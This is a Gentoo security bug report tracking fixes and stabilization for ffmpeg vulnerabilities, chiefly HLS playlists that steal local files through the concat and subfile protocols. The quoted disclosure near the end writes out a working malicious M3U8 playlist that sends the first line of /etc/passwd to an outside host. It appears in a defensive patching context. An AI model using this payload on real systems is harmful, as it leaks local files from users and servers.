| Summary: | <media-video/ffmpeg-2.8.5: stealing local files with HLS+concat (CVE-2016-{1897,1898,2326,2327}) | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED FIXED | ||
| Severity: | minor | CC: | alexander, barzog, ivnaidenov, limanski, linear-techs, media-video, pacho, ykonotopov |
| Priority: | Normal | ||
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://www.openwall.com/lists/oss-security/2016/01/13/3 | ||
| Whiteboard: | A4 [glsa] | ||
| Package list: | Runtime testing required: | --- | |
| Bug Depends on: | 565684, 570878 | ||
| Bug Blocks: | |||
Archlinux rebuilt ffmpeg only with --disable-demuxer='hls' --disable-protocol='concat,hls' to workaround this bug, without disabling network capabilities in general. Was that the upstream fix or is this unrelated?: http://git.videolan.org/?p=ffmpeg.git;a=blobdiff;f=libavformat/concatdec.c;h=d226e1504ed90d344deb48fbbc79e18ad89c92eb;hp=d21805fe71b02ae62aaf9ec2d340458d0a116b8a;hb=fdb2d4b1084c92aa9bb1d2f948abdb86a361f219;hpb=a43deea8614a901aae85d175b6580183aede20f9 http://git.videolan.org/?p=ffmpeg.git;a=commit;h=fdb2d4b1084c92aa9bb1d2f948abdb86a361f219 *** Bug 572050 has been marked as a duplicate of this bug. *** from: http://ffmpeg.org/security.html 2.8.5 Fixes following vulnerabilities: CVE-2016-1897,CVE-2016-1898, 23b903aaf4eefb1ce1396a32525c8e5501d5cec8 / 6ba42b6482c725a59eb468391544dc0c75b8c6f0 CVE-2016-1897,CVE-2016-1898, b7d54d6e072690a62d5ea5ade66ffce6944a5ff4 / 7145e80b4f78cff5ed5fee04d4c4d53daaa0e077 CVE-2016-1897,CVE-2016-1898, 28f89bc439be1de9a61ac404ce79f9bc4cac5ec8 / cfda1bea4c18ec1edbc11ecc465f788b02851488 so, 2.8.5 should fix it. stabilization process was started in bug #565684, but you can cc arches here if you prefer According to this http://ffmpeg.org/index.html#news, 2.7.5, 2.6.7 and 2.5.10 are also contains fix for these vulnerabilities. So 2.6.7 can go stable (since 2.6 is current stable branch in Gentoo). *** Bug 572244 has been marked as a duplicate of this bug. *** I've checked ffmpeg-2.6.7 emerged successfully with renamed ffmpeg-2.6.4.ebuild. well, since sec team seems busy, ccing arches here @arch teams: target is =media-video/ffmpeg-2.8.5 you'll likely need x265 (bug #570878) amd64 stable x86 stable Stable for HPPA PPC64. Stable on alpha, took app-arch/snappy along. *** Bug 565684 has been marked as a duplicate of this bug. *** arm stable CVE-2016-2327 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2327): libavcodec/pngenc.c in FFmpeg before 2.8.5 uses incorrect line sizes in certain row calculations, which allows remote attackers to cause a denial of service (out-of-bounds array access) or possibly have unspecified other impact via a crafted .avi file, related to the apng_encode_frame and encode_apng functions. CVE-2016-2326 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2326): Integer overflow in the asf_write_packet function in libavformat/asfenc.c in FFmpeg before 2.8.5 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PTS (aka presentation timestamp) value in a .mov file. CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the subfile protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains an arbitrary line of a local file. CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains the first line of a local file. ppc stable sparc stable ia64 stable. Maintainer(s), please cleanup. Security, please vote. Added to existing GLSA. This issue was resolved and addressed in GLSA 201606-09 at https://security.gentoo.org/glsa/201606-09 by GLSA coordinator Kristian Fiskerstrand (K_F). |
From ${URL} : Hello! I found some strange behavior in ffmpeg which can lead to stealing local files during ffmpeg/ffprobe exec, it's also applied to libav. I've underestimated the impact of this bug, so it was full disclosured in this article (Russian language, but google translate works fine with it) - http://habrahabr.ru/company/mailru/blog/274855 In short: if linux user download specially prepared video file (with any extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat" protocol in url:, #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST header.m3u8: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://example.org? If user launches ffmpeg-based video player (MPlayer, etc..), first line of /etc/passwd will be sent to http://example.org? in http://example.org?# $FreeBSD: release/100.0/et.. request. The same happens when file manager tries to generate thumbnail for this file. All this can be applied to server-run ffmpeg during video conversion. FFmpeg/libav security teams are already notified, but official patches are not available yet, so you can rebuild ffmpeg with --disable-network configure option which prevents this vulnerability from being exploited. Moreover, it's always recommended to run ffmpeg in isolated environment when processing untrusted files (googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html) @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.